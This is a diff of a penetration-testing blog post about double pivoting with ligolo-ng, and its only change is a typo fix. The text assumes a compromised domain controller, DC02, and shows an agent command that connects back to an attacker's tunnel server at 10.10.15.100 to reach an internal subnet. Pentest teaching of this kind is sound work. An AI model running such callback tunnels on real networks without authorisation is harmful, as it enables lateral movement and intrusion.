ubghacking/ubghacking.github.io/_posts/2023-06-26-ligolo-pivoting-part3.md

 <h3>Double Ligolo Pivot!</h3>

-I wiull now assume that you have comrpomised DC02, and need to access FS01 in 172.18.3.0/24.
+I will now assume that you have comrpomised DC02, and need to access FS01 in 172.18.3.0/24.
 We can use the same method, and create a second Ligolo session.
 Once ligolo-ng is on DC02, we can run the agent command again, on DC02:

 {% highlight bash linenos %}
 ./agent.exe -connect 10.10.15.100:11601 -ignore-cert